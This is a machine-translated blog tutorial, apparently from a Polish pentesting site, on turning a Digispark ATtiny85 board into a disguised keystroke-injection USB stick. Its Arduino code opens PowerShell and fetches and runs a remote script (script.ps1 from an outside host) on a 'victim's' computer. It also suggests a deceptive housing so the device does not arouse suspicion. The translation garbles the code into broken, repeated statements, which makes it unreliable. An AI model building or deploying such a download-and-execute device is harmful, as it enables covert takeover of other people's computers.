プログラム可能な「フラッシュドライブ」または迅速にコンピュータを引き継ぐ方法

今日、エントリはHak5から高価で人気のあるラバーダッキーのラインに沿って独自のプログラム可能なUSBスティックを作成する方法についてのチュートリアルの形式です。 これは、キーボードの原理で動作します – コンピュータに接続された事前にプログラムされたキーシーケンスを入力します。 最初のステップは、ATtiny85マイクロコントローラに基づいてミニチュアArduinoボードを購入することです – Digispark。 最も安いあなたは人気のオークションサイトの一つで中国から私たちの友人からそれを見つけることができます。 価格は$1の低さからそこから始まります –Digispark ATtiny85 - デジスパーク 時々いくつかのコンピュータ(特にUSB3ポート)によるDigiSparkの検出に問題があるので、すぐにアダプタを買いだめするのが最善です。 この問題を解決する (コスト約2 $) –アダプタ USB アダプター 注文された機器が私たちに到達したときに、我々はAdruino IDEになります私たちは、その環境をプログラムする必要があります – 私たちは、Digisparkaに接続するArduino チュートリアルは、ここで見つけることができます –スキーム私たちの コントローラは、メモリの限られた量を持っているので、正しいペイロードはそれに収まらないかもしれません。 私は、後で被害者のコンピュータ上で実行されるpowershellを使用してペイロードを含むスクリプトをダウンロードするコードを置くことによって、この問題を回避しました:

#include "DigiKeyboard.h" 無効セットアップ() { }

ボイドループ(){ディジキーボード.センドキーストローク(0);ディジキーボード.ディレイ(500);デジキーボード.センドキーストローク(KEY_R、 MOD_GUI_LEFT);デジキーボード.delay(500);デジキーボード.print("パワーシェル");デジキーボード.sendKeyStroke(500);デジキーボード.送信キーストローク(500);デジキーボード.sendKeyStroke(500);デジキーボード.sendKeyStroke("パワーシェル");デジキーボード.sendKeyStroke(500); ディジキーボード.print("パワーシェル");デジキーボード.センドキーストローク(500);デジキーボード.プリント(「パワーシェル」);デジキーボード.センドキーストローク(500);デジキーボード.KEY_ENTER;デジキーボード. 遅延(1000); DigiKeyboard.print("$client = 新しいオブジェクトシステム.Net.Webクライアント"); デジキーボード.sendKeyStroke(KEY_ENTER); デジキーボード.遅延 (500); DigiKeyboard.print($client.ファイルをダウンロードします("https://my127001.pl/script.ps1" ,"スクリプト.ps1"))。デジキーボード.センドキーストローク(KEY_ENTER);ディジキーボード.ディレイ(2000);ディジキーボード.センドキーストローク(0、MOD_GUI_LEFT |KEY_R);ディジキーボード.ディレイ(750);ファイルスクリプト.ps1".exeパワーシェル印刷します。デジキーボード.センドキーストローク(KEY_ENTER);(;;){ /*空*/ }

}

私たちのペンドリバの外観をさらによりオーサリなものにするために、疑惑を喚起しないように、例えばリンクの下のデザインから印刷された住宅を買いだめする価値があります – ハウジング全体がこのように見え、犠牲者のコンピュータを数秒で制御することができます:[キャプションid="attachment_172"align="aligncenter"幅="623"] プログラム可能な「フラッシュドライブ」

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

ブックマーク パーマリンク.

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です